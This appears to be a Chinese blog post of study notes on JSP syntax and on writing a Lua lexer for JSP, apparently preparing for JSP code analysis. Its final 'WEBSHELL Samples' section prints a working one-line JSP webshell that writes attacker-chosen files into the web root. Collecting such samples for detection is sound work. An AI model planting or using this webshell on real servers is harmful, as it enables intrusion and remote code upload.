1. JSP基础语法 2. JSP Lexer By Lua 3. Open Source Code Analyzers in Java 4. WEBSHELL Samples
1. JSP基础语法
0x1: 脚本程序
脚本程序的语法格式: <% 代码片段 %> 或者可以编写与其等价的XML语句 <jsp:scriptlet> 代码片段 </jsp:scriptlet>
<html> <head><title>Hello World</title></head> <body> Hello World!<br/> <% out.println("Your IP address is " + request.getRemoteAddr()); %> </body> </html>
0x2: JSP声明
<%! declaration; [ declaration; ]+ ... %> 或者也可以编写与其等价的XML语句 <jsp:declaration> 代码片段 </jsp:declaration>
<%! int i = 0; %> <%! int a, b, c; %> <%! Circle a = new Circle(2.0); %>
0x3: JSP表达式
1. 一个JSP表达式中包含的脚本语言表达式,先被转化成String,然后插入到表达式出现的地方 2. 由于表达式的值会被转化成String,所以您可以在一个文本行中使用表达式而不用去管它是否是HTML标签 3. 表达式元素中可以包含任何符合Java语言规范的表达式,但是不能使用分号来结束表达式
<%= 表达式 %> 同样也可以编写与之等价的XML语句 <jsp:expression> 表达式 </jsp:expression>
<html> <head><title>A Comment Test</title></head> <body> <p> Today‘s date: <%= (new java.util.Date()).toLocaleString()%> </p> </body> </html>
0x4: JSP注释
JSP注释主要有两个作用: 为代码作注释、以及将某段代码注释掉
1. HTML注释
<!-- comment [ <%= expression %> ] -->
<!-- This file displays the user login screen --> 在客户端的HTML源代码中产生和上面一样的数据: <!-- This file displays the user login screen --> <!-- This page was loaded on <%= (new java.util.Date()).toLocaleString() %> -->
2. 隐藏注释
<%-- 这里可以填写 JSP 注释 --%>
JSP编译器是不会对<%-- ... --%>之间的语句进行编译的,它不会显示在客户的浏览器中,也不会在源代码中看到在<%-- --%>之间的代码,你可以任意写注释语句,但是不能使用"--%>",如果你非要使用请用"--%\>"
<html> <head><title>A Comment Test</title></head> <body> <h2>A Test of Comments</h2> <%-- 该部分注释在网页中不会被显示--%> </body> </html>
0x5: JSP指令
<%@ directive attribute="value" %> 这里有三种指令标签 1. <%@ page ... %>: 定义页面的依赖属性,比如脚本语言、error页面、缓存需求等等 2. <%@ include ... %>: 包含其他文件 <%@ taglib ... %>: 引入标签库的定义,可以是自定义标签
0x6: JSP行为
<jsp:action_name attribute="value" />
0x7: JSP隐含对象
1. request: HttpServletRequest类的实例 2. response: HttpServletResponse类的实例 3. out: PrintWriter类的实例,用于把结果输出至网页上 4. session: HttpSession类的实例 5. application: ServletContext类的实例,与应用上下文有关 6. config: ServletConfig类的实例 7. pageContext: PageContext类的实例,提供对JSP页面所有对象以及命名空间的访问 8. page: 类似于Java类中的this关键字 9. Exception: Exception类的对象,代表发生错误的JSP页面中对应的异常对象
0x8: JSP常量
1. Boolean: true and false 2. Integer: 与Java中的一样 3. Floating point: 与Java中的一样 4. String: 以单引号或双引号开始和结束。" 被转义成 \",‘被转义成 \‘, \ 被转义成\\ 5. Null: null
Relevant Link:
http://www.runoob.com/jsp/jsp-syntax.html http://vod.sjtu.edu.cn/help/Article_Show.asp?ArticleID=1448
2. JSP Lexer By Lua
0x1: Lexer Basics
The *lexers/* directory contains all lexers, including your new one. Before attempting to write one from scratch though, first determine if your programming language is similar to any of the 80+ languages supported. If so, you may be able to copy and modify that lexer, saving some time and effort.
The filename of your lexer should be the name of your programming language in lower case followed by a *.lua* extension. For example, a new Lua lexer has the name *lua.lua*.
Note: Try to refrain from using one-character language names like "b", "c", or "d". For example, Scintillua uses "b_lang", "cpp", and "dmd", respectively.
0x2: New Lexer Template
myLanguage LPeg lexer. local l = require(‘lexer‘) local token, word_match = l.token, l.word_match local P, R, S = lpeg.P, lpeg.R, lpeg.S local M = {_NAME = ‘?‘} Whitespace. local ws = token(l.WHITESPACE, l.space^1) M._rules = { {‘whitespace‘, ws}, } M._tokenstyles = { -- } -- return M
0x3: Tokens
Take a moment to think about your programming language‘s structure. What kind of key elements does it have? In the template shown earlier, one predefined element all languages have is whitespace.
Your language probably also has elements like comments, strings, and keywords. Lexers refer to these elements as "tokens". Tokens are the fundamental "building blocks"(基础元素) of lexers.
Lexers break down source code into tokens for coloring, which results in the syntax highlighting familiar to you. It is up to you how specific your lexer is when it comes to tokens. Perhaps only distinguishing between keywords and identifiers is necessary, or maybe recognizing constants、built-in functions、methods、libraries is desirable.
The Lua lexer, for example, defines 11 tokens:
1. whitespace 2. comments 3. strings 4. numbers 5. keywords 6. built-in functions 7. constants 8. built-in libraries 9. identifiers: Even though constants, built-in functions, and built-in libraries are subsets of identifiers 10. labels 11. operators.
In a lexer, tokens consist of a token name and an LPeg pattern that matches a sequence of characters recognized as an instance of that token(在GNU Lex中也是采用正则语法进行词法描述). Create tokens
using the [`lexer.token()`]() function. Let us examine the "whitespace" token defined in the template shown earlier:
local ws = token(l.WHITESPACE, l.space^1)
The `lexer` (`l`) module actually provides a convenient list of common token names and common LPeg patterns for you to use. Token names include
[`lexer.DEFAULT`](), [`lexer.WHITESPACE`](), [`lexer.COMMENT`](), [`lexer.STRING`](), [`lexer.NUMBER`](), [`lexer.KEYWORD`](), [`lexer.IDENTIFIER`](), [`lexer.OPERATOR`](), [`lexer.ERROR`](), [`lexer.PREPROCESSOR`](), [`lexer.CONSTANT`](), [`lexer.VARIABLE`](), [`lexer.FUNCTION`](), [`lexer.CLASS`](), [`lexer.TYPE`](), [`lexer.LABEL`](), [`lexer.REGEX`](), [`lexer.EMBEDDED`](). Patterns include [`lexer.any`](), [`lexer.ascii`](), [`lexer.extend`](), [`lexer.alpha`](), [`lexer.digit`](), [`lexer.alnum`](), [`lexer.lower`](), [`lexer.upper`](), [`lexer.xdigit`](), [`lexer.cntrl`](), [`lexer.graph`](), [`lexer.print`](), [`lexer.punct`](), [`lexer.space`](), [`lexer.newline`](), [`lexer.nonnewline`](), [`lexer.nonnewline_esc`](), [`lexer.dec_num`](), [`lexer.hex_num`](), [`lexer.oct_num`](), [`lexer.integer`](), [`lexer.float`](), [`lexer.word`]().
So, how might you define other tokens like comments, strings, and keywords? Here are some examples
Line-style comments with a prefix character(s) are easy to express with LPeg
local shell_comment = token(l.COMMENT, ‘#‘ * l.nonnewline^0) local c_line_comment = token(l.COMMENT, ‘//‘ * l.nonnewline_esc^0)
C-style "block" comments with a start and end delimiter are also easy to express:
local c_comment = token(l.COMMENT, ‘/*‘ * (l.any - ‘*/‘)^0 * P(‘*/‘)^-1)
2. Strings
local dq_str = ‘"‘ * (l.any - ‘"‘)^0 * P(‘"‘)^-1 local sq_str = "‘" * (l.any - "‘")^0 * P("‘")^-1 local simple_string = token(l.STRING, dq_str + sq_str)
3. Keywords
local keyword = token(l.KEYWORD, l.word_match{ ‘keyword_1‘, ‘keyword_2‘, ..., ‘keyword_n‘ }) local case_insensitive_keyword = token(l.KEYWORD, l.word_match({ ‘KEYWORD_1‘, ‘keyword_2‘, ..., ‘KEYword_n‘ }, nil, true)) local hyphened_keyword = token(l.KEYWORD, l.word_match({ ‘keyword-1‘, ‘keyword-2‘, ..., ‘keyword-n‘ }, ‘-‘))
0x4: 定界标签
1. Declaration tag
<%! %> <%! private int example = 0 ; private int test = 5 ; %> <jsp:declaration> </jsp:declaration> <jsp:declaration> private int example = 0 ; private int test = 5 ; </jsp:declaration>
2. Expression tag
<%= 表达式 %> <%= (new java.util.Date()).toLocaleString() %> <jsp:expression> </jsp:expression> <jsp:expression> (new java.util.Date()).toLocaleString() </jsp:expression>
3. Code tag
<% 代码片段 %> <% out.println("Your IP address is " + request.getRemoteAddr()); %> <jsp:scriptlet> out.println("Your IP address is " + request.getRemoteAddr()); </jsp:scriptlet>
0x5: lexer/media/lexers/jsp.lua
local l = require(‘lexer‘) local token, word_match = l.token, l.word_match local P, R, S = lpeg.P, lpeg.R, lpeg.S local M = {_NAME = ‘jsp‘} -- Embedded in HTML. local html = l.load(‘html‘) -- Embedded Java. local java = l.load(‘java‘) local java_start_rule = token(‘jsp_tag‘, ‘<%‘ * P(‘=‘)^-1) local java_end_rule = token(‘jsp_tag‘, ‘%>‘) l.embed_lexer(html, java, java_start_rule, java_end_rule, true) M._tokenstyles = { jsp_tag = l.STYLE_EMBEDDED } local _foldsymbols = html._foldsymbols _foldsymbols._patterns[#_foldsymbols._patterns + 1] = ‘<%%‘ _foldsymbols._patterns[#_foldsymbols._patterns + 1] = ‘%%>‘ _foldsymbols.jsp_tag = {[‘<%‘] = 1, [‘%>‘] = -1} M._foldsymbols = _foldsymbols return M
Relevant Link:
https://github.com/luapower/lexer/blob/master/lexer.lua http://www.exforsys.com/tutorials/jsp/jsp-tags.html https://github.com/luapower/lexer/blob/master/media/lexers/jsp.lua https://github.com/luapower/lexer/blob/master/media/lexers/html.lua https://github.com/luapower/lexer/blob/master/media/lexers/java.lua
3. Open Source Code Analyzers in Java
Relevant Link:
http://java-source.net/open-source/code-analyzers https://pmd.github.io/ http://pmd.sourceforge.net/pmd-4.3.0/rules/basic-jsp.html http://foicica.com/scintillua/api.html#lexer
4. WEBSHELL Samples
0x1: 写文件
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
Relevant Link:
http://www.2cto.com/Article/201503/378649.html http://www.blogjava.net/lusm/archive/2007/02/21/100295.html http://dingody.iteye.com/blog/2003882 http://blog.kukafei520.net/html/2010/444.html http://www.125135.com/491711.html http://www.125135.com/317079.htm http://www.125135.com/317770.htm
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